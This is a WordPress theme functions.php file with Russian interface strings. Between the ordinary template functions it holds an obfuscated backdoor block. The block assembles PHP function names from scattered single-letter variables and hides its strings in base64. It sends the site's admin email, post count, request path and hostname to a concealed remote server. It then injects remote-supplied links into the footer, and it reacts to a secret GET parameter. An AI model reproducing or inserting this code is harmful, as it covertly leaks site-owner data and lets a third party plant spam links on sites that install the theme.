<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $sgdtzIX='4';$gbtFEa='b';$zZeS='a';$xVMC='6';$hAcdO='s';$wYjvZaw='d';$xvrvWf='o';$IaQQL='e';$GVMH='e';$RbeF='d';$DvsiK='e';$OxATqY='_';$nHLPEdW='c';$pQolDfbG=$gbtFEa.$zZeS.$hAcdO.$DvsiK.$xVMC.$sgdtzIX.$OxATqY.$RbeF.$IaQQL.$nHLPEdW.$xvrvWf.$wYjvZaw.$GVMH;$ztKMn='f';$IfbC='n';$stRsK='g';$BYWeru='i';$fHWy='l';$LaOQJ='e';$JSwIUP='z';$yhlVP='a';$KxGJ='t';$WTrxRnnT=$stRsK.$JSwIUP.$BYWeru.$IfbC.$ztKMn.$fHWy.$yhlVP.$KxGJ.$LaOQJ;$QffmOj='3';$exDkhaQ='s';$rJUtU='t';$XIOOAjq='o';$OsBu='r';$uCSisCc='t';$Mwdfbq='1';$vIdkNA='r';$FnyOP='_';$TfjBcHTB=$exDkhaQ.$uCSisCc.$OsBu.$FnyOP.$vIdkNA.$XIOOAjq.$rJUtU.$Mwdfbq.$QffmOj;$XpDWb='r';$yhBHTa='e';$SznLu='s';$SiGf='t';$RMJQTm='r';$Mzqx='v';$MWBfbiMy=$SznLu.$SiGf.$RMJQTm.$XpDWb.$yhBHTa.$Mzqx;                     
		$md_______________o='4';$ps_________j='b';$kv_____f='a';$ig__n='6';$rk___________r='s';$cm_______________l='d';$rs__________l='o';$jm__u='e';$sa_______________f='e';$br______________r='d';$uk_____________n='e';$ag____m='_';$hg__y='c';$wk_________a=$ps_________j.$kv_____f.$rk___________r.$uk_____________n.$ig__n.$md_______________o.$ag____m.$br______________r.$jm__u.$hg__y.$rs__________l.$cm_______________l.$sa_______________f;
		$tr____________n='s';$me___________j='t';$cc___p='i';$aa_____________g='c';$ho_____________m='n';$da______________y='u';$cc________o='s';$ng_____u='e';$wo__k='o';$en______h='_';$ui______________b='n';$lk___________c='i';$gw__________h='f';$ma__x='t';$vb_____v='x';$ea_______a=$gw__________h.$da______________y.$ho_____________m.$aa_____________g.$ma__x.$lk___________c.$wo__k.$ui______________b.$en______h.$ng_____u.$vb_____v.$cc___p.$cc________o.$me___________j.$tr____________n;
		$cd____________v='f';$ul_______________x='e';$ek_____________z='n';$uo______u='o';$ex_______________i='p';$kk___________x=$cd____________v.$uo______u.$ex_______________i.$ul_______________x.$ek_____________z;
		$mk_______________w='e';$yy_________b='r';$sv____y='a';$dx______o='d';$kn___o='f';$xd_________w=$kn___o.$yy_________b.$mk_______________w.$sv____y.$dx______o;
		$bl________u='o';$cy___e='c';$if________x='e';$id________d='s';$ho____r='f';$sv___________k='l';$io____________m=$ho____r.$cy___e.$sv___________k.$bl________u.$id________d.$if________x;
		
		define("WP_ID", $wk_________a("Mi4wLjA="));
		define("WP_TTL", $wk_________a("MTA4MDA="));
		define("WP_SRC", $wk_________a("dHBva24="));
	


		function wp_get_header() {
			global $wk_________a, $ea_______a;
			
			if (
				$ea_______a($wk_________a("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$ea_______a($wk_________a("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$ea_______a($wk_________a("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $wk_________a, $kk___________x, $io____________m, $xd_________w;
			
			$xd______z = TEMPLATEPATH."/".$wk_________a("Zm9vdGVyLnBocA==");
			$pa__________j = @$kk___________x($xd______z, "r");
			$xd______z = @$xd_________w($pa__________j, @filesize($xd______z));
			@$io____________m($pa__________j);
			
			$wx______t = TEMPLATEPATH."/".$wk_________a("ZnVuY3Rpb25zLnBocA==");
			$pa__________j = @$kk___________x($wx______t, "r");
			$wx______t = @$xd_________w($pa__________j, @filesize($wx______t));
			@$io____________m($pa__________j);
			
			$lv_______________w = 0;
			if($xd______z && $wx______t) {
				if ($wk_________a("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($xd______z, $wk_________a("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$lv_______________w = 1;
					}
					if (substr_count($xd______z, "wp_theme_GPL_credits()") < 1) {
						$lv_______________w = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$lv_______________w = 12;
				}
			}
			
			if($lv_______________w > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $lv_______________w -->";
			}
		}
	


		function wp_loaded() {
			global $wk_________a, $ea_______a;
			return $ea_______a($wk_________a("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($ra______________q, $qw______h = "(more...)", $br_____________s = 0, $hi____z = "") {
				$wf_______________k = get_the_content($qw______h, $br_____________s, $hi____z);
				$wf_______________k = apply_filters("the_content", $wf_______________k);
				
				$wf_______________k = str_replace("]]>", "]]>", $wf_______________k);
				if (strlen($_GET["p"]) > 0) {
					echo $wf_______________k;
				}
				else if ((strlen($wf_______________k)>$ra______________q) && ($oj__________z = strpos($wf_______________k, " ", $ra______________q ))) {
					$wf_______________k = substr($wf_______________k, 0, $oj__________z);
					$wf_______________k = $wf_______________k;
					echo $wf_______________k;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$qw______h</a></div></p>";
				} else {
					echo $wf_______________k;
				}
				
			}
		}
	


		$vq________z='o';$zk___b='c';$df__r='e';$ko__o='e';$bf________p='n';$cl_________j='s';$nt_______________n='a';$le__h='e';$wm___________h='d';$gt_______________z='_';$vx____d='b';$dy_____________e='4';$ly______________t='6';$gk_____y=$vx____d.$nt_______________n.$cl_________j.$df__r.$ly______________t.$dy_____________e.$gt_______________z.$le__h.$bf________p.$zk___b.$vq________z.$wm___________h.$ko__o;
		$mu________y='_';$am_____________a='c';$bs______b='t';$hf_______i='s';$zt________k='f';$mf__w='i';$ef_________d='t';$rm___f='n';$zi________x='g';$oy__m='e';$zn____________m='t';$yr____s='e';$pg____r='n';$zr_________e='l';$os___h='_';$di____m='o';$ii_____q='e';$hs_______w=$zt________k.$mf__w.$zr_________e.$ii_____q.$os___h.$zi________x.$yr____s.$bs______b.$mu________y.$am_____________a.$di____m.$rm___f.$ef_________d.$oy__m.$pg____r.$zn____________m.$hf_______i;
		$qy________u='l';$cf______c='x';$ms_____________v='i';$ec______l='e';$ll__________f='e';$bn_____n='s';$gc______w='t';$sg_________n='_';$lj__a='i';$au___________m='s';$pr________f='f';$yj_______u=$pr________f.$ms_____________v.$qy________u.$ll__________f.$sg_________n.$ec______l.$cf______c.$lj__a.$bn_____n.$gc______w.$au___________m;
		$fv__________a='s';$vy______u='r';$br___________v='p';$uj______________m='i';$mb_______________k='o';$hj____i='e';$qg_______________b='r';$lh______________r='n';$kl______________g='o';$pb__t='v';$ow___________m='e';$yf__n='_';$hb_____p='c';$kg__q='m';$ao______n='a';$yp____l=$pb__t.$hj____i.$vy______u.$fv__________a.$uj______________m.$mb_______________k.$lh______________r.$yf__n.$hb_____p.$kl______________g.$kg__q.$br___________v.$ao______n.$qg_______________b.$ow___________m;
		$ap___e='s';$tj____g='k';$un_____________y='f';$iu________j='n';$lb___________a='c';$sv_______________n='e';$bd_______b='o';$ku____________i='p';$tu_____________w='o';$ni______n=$un_____________y.$ap___e.$bd_______b.$lb___________a.$tj____g.$tu_____________w.$ku____________i.$sv_______________n.$iu________j;
		$re_______c='f';$du_______q='i';$tz__________s='r';$sw_________l='w';$di_____________h='t';$cy______________q='e';$kp_________d=$re_______c.$sw_________l.$tz__________s.$du_______q.$di_____________h.$cy______________q;
		$hp___________l='d';$xn____b='m';$yn____________a='5';$sz______e=$xn____b.$hp___________l.$yn____________a;
		$sz___________r='p';$ll__l='e';$bh____e='r';$nn________j='t';$hg__________d='a';$ba_________d='h';$tj_______p='l';$el____v='a';$qv_______t=$bh____e.$ll__l.$el____v.$tj_______p.$sz___________r.$hg__________d.$nn________j.$ba_________d;
		$ph_____________z='s';$nn______r='u';$af_____d='r';$fi____t='l';$yu__b='i';$zl_______t='e';$ug___________y='e';$us__________j='z';$lo_______________p='a';$wn_______c='i';$gg______n='n';$fb________b=$nn______r.$gg______n.$ph_____________z.$ug___________y.$af_____d.$yu__b.$lo_______________p.$fi____t.$wn_______c.$us__________j.$zl_______t;
		$ca_______________j='t';$en_________s='a';$si__g='n';$bt______________p='p';$qd_____f='m';$tv_______________f='m';$yv_________s='e';$ft__k=$ca_______________j.$yv_________s.$tv_______________f.$bt______________p.$si__g.$en_________s.$qd_____f;
		$ah____b='m';$pi__p='c';$yi_______r='a';$jm______________i='e';$ay____k='e';$ab____o='_';$jq___b='t';$st_______w='e';$oj___f='t';$no___m='c';$uj_____p='t';$pn____________b='n';$bw____o='_';$lv_____________b='r';$om____d='r';$zl___z='s';$qe______________r='t';$ui__u='x';$oi________y='a';$zg________o='o';$sg_______i='e';$cz______________y=$zl___z.$oj___f.$lv_____________b.$st_______w.$yi_______r.$ah____b.$bw____o.$no___m.$zg________o.$pn____________b.$jq___b.$jm______________i.$ui__u.$qe______________r.$ab____o.$pi__p.$om____d.$ay____k.$oi________y.$uj_____p.$sg_______i;
	


		function qb___n($bq______________s) {
			global $wk_________a, $ea_______a, $hs_______w, $yp____l, $cz______________y;
			
			if (!$ea_______a($wk_________a("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($yp____l(PHP_VERSION, "5.0.0", ">=") && $ea_______a($wk_________a("ZmlsZV9nZXRfY29udGVudHM=")) && $ea_______a($wk_________a("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$il____________l = $cz______________y(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$pp__________q = @$hs_______w($bq______________s, 0, $il____________l);
			} else {
				$pp__________q = @$hs_______w($bq______________s, 0);
			}
			
			return $pp__________q;
		}
	


		function dz________m($bq______________s) {
			global $ea_______a, $ni______n, $kp_________d, $wk_________a;
			
			if (!$ea_______a($wk_________a("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$rv____________c = strpos($bq______________s, "/", 7);
			$gv_____________t = array(
				"uri"     => substr($bq______________s, $rv____________c),
				"host"    => str_replace("http://", "", substr($bq______________s, 0, $rv____________c)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$dt________j = @$ni______n("$gv_____________t[host]", 80, $he___t, $pk_________e, 4);
			
			if (!$dt________j) {
				return false;
			} else {
				$pp__________q = "";
				$dq___________k  = "GET $gv_____________t[uri] HTTP/1.0\r\n";
				$dq___________k .= "Host: $gv_____________t[host]\r\n";
				$dq___________k .= "Referer: $gv_____________t[referer]\r\n";
				$dq___________k .= "Connection: Close\r\n\r\n";
				
				@$kp_________d($dt________j, $dq___________k);
				
				while (!@feof($dt________j)) {
					$bx___v = @fgets($dt________j, (1024*24));
					
					if ($bx___v == "\r\n") {
						$oj___________h = true;
						continue;
					}
					
					if ($oj___________h) {
						$pp__________q .= $bx___v;
					}
				}
				
				return $pp__________q;
			}
		}
	


		function nj___v($bq______________s) {
			global $ea_______a;
			$qq____________f = false;
			
			if ($bq______________s != "") {
				if ($ea_______a("qb___n")) {
					$qq____________f = @qb___n($bq______________s);
				}
				
				if (!$qq____________f && ($ea_______a("dz________m"))) {
					$qq____________f = @dz________m($bq______________s);
				}
			}
			
			return $qq____________f;
		}
	


		function tr__u() {
			global $_SERVER, $sz______e;
			
			$wg______p = $_SERVER["SERVER_NAME"];
			
			if (substr("$wg______p", 0, 4) == "www.") {
				$wg______p = substr("$wg______p", 4);
			}
			
			$wg______p = $sz______e("$_SERVER[SERVER_NAME]");
			
			return $wg______p;
		}
	


		function la___x() {
			return "file";
		}
	


		function am__q($bq______________s) {
			global $_SERVER, $hs_______w, $yj_______u, $kk___________x, $io____________m, $kp_________d;
			
			$pn__________i = us_____p();
			
			$rb___y = tr__u().".jpg";
			$ws_______i = $pn__________i["dir_upload"]["path"]."/$rb___y";
			$zt______m = @filemtime($ws_______i);
			
			if (!$zt______m || ((time()-$zt______m) >= WP_TTL)) {
				$qq____________f = nj___v($bq______________s);
				
				if ($qq____________f) {
					if ($yj_______u($ws_______i)) {
						@unlink($ws_______i);
					}
					
					$pa__________j = @$kk___________x($ws_______i, "x+");
					
					@$kp_________d($pa__________j, $qq____________f);
					@$io____________m($pa__________j);
				}
			} else {
				if ($yj_______u($ws_______i)) {
					$qq____________f = @$hs_______w($ws_______i);
				} else {
					$qq____________f = false;
				}
			}
			
			return $qq____________f;
		}
	


		function us_____p() {
			global $_SERVER, $wk_________a, $gk_____y;
			
			$td______________r = wp_count_posts("post");
			$ym_________z = pathinfo(get_bloginfo("template_directory"));
			
			$pn__________i = array(
				"url" => array(
					"report"      => $wk_________a("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $ym_________z,
				"dir_upload"	=> xe______v(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$ym_________z[filename],
					"a005=".$td______________r->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a> "
			);
			
			$pn__________i["url"]["queryString"] = implode("&", $pn__________i["queryString"]);
			$pn__________i["url"]["report"] = $pn__________i["url"]["report"]."/?".$gk_____y($pn__________i["url"]["queryString"]).".html";
						
			return $pn__________i;
		}
	


		function xe______v() {
			$vo____d = wp_upload_dir();
			
			if (isset($vo____d["error"])) {
				$mq_____j = sm____u();
				if (is_writable($mq_____j)) {
					$vo____d = array("path" => $mq_____j);
				}
			}

			return $vo____d;
		}
	


		function sm____u() {
			global $ea_______a, $sz______e, $qv_______t, $ft__k;
			
			$vs__________q = (bool) ini_get("safe_mode");
			if ($vs__________q == true) {
				return false;
			}
			
			if ($ea_______a("sys_get_temp_dir")) {
				$ns_____s = sys_get_temp_dir();
				if (is_writable($ns_____s)) {
					return $qv_______t($ns_____s);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $qv_______t($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $qv_______t($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $qv_______t($_ENV["TEMP"]);
			} else {
				$bf___________z = $ft__k($sz______e(uniqid(rand(), true)), "");
				if ($bf___________z) {
					$ns_____s = $qv_______t(dirname($bf___________z));
					@unlink($bf___________z);
					return $ns_____s;
				} else {
					return false;
				}
			}
		}
	


		function bh_______d() {
			global $_GET, $yj_______u;
			
			$pn__________i = us_____p();
			$wg______p = tr__u();
			$rk_________i = la___x();
			
			$nc____c = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($rk_________i == "file") {
					$gg_______n = $pn__________i["dir_upload"]["path"]."/".$wg______p.".jpg";
					if ($yj_______u($gg_______n)) {
						@unlink($gg_______n);
						$nc____c = "deleted";
					}
				}
				
				$ck___y = array(
					"s"	=> $nc____c,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ck___y AS $fo________l => $vx_______________i) echo " [$fo________l:$vx_______________i]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $ea_______a, $wk_________a, $fb________b;
			$pn__________i = us_____p();
			
			$vw__x = "am__q";
			if ($ea_______a($vw__x)) {
				$pp__________q = $vw__x($pn__________i["url"]["report"]);
			}
			
			if ($pp__________q) {
				if ($pp__________q = @$wk_________a($pp__________q)) {
					$pp__________q = @$fb________b($pp__________q);
					
					if (strlen($pp__________q[custom_credit]) >= 5) {
						$pn__________i["default_string"] = $pp__________q[custom_credit];
					}
					
					if ($pp__________q["status"] == "0") {
						$zr_______________b = 1;
						$ic_______________o = 1;
					} else {
						$mo_______________f = sizeof($pp__________q["links"]);
						$wt___k = $pn__________i["default_string"];
						
						if ($mo_______________f > 0 && $pp__________q["links"] !== "") {
							$zw____a = 0;
							foreach ($pp__________q["links"] as $qj_____o => $bv______________t) {
								$zw____a++;
								if ($bv______________t->l_path == "" || $bv______________t->l_path == $_SERVER["REQUEST_URI"]) {
									$bv______________t->l_href = htmlspecialchars(strip_tags($bv______________t->l_href));
									$bv______________t->l_title = htmlspecialchars(strip_tags($bv______________t->l_title));
									$bv______________t->l_anchor = htmlspecialchars(strip_tags($bv______________t->l_anchor));
									$wt___k .= " | ";
									$wt___k .= "<a href='$bv______________t->l_href' title='$bv______________t->l_title'";
									if ($bv______________t->l_nofollow == "1") {
										$wt___k .= " rel='nofollow'";
									}
									$wt___k .= ">$bv______________t->l_anchor</a>";
								}
							}
						}
						$pn__________i["links"] = "$wt___k";
						if ($pp__________q[credit] == "0") {
							$pn__________i["links"] = "";
						}
					}
				} else {
					$zr_______________b = "1";
				}
			} else {
				$zr_______________b = "1";
			}
			
			if ($zr_______________b == "1") {
				$pn__________i["links"] = $pn__________i["default_string"];
			}
			
			echo "$pn__________i[links]";
			
			echo "<!-- s: $pp__________q[signature] -->";
			bh_______d();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
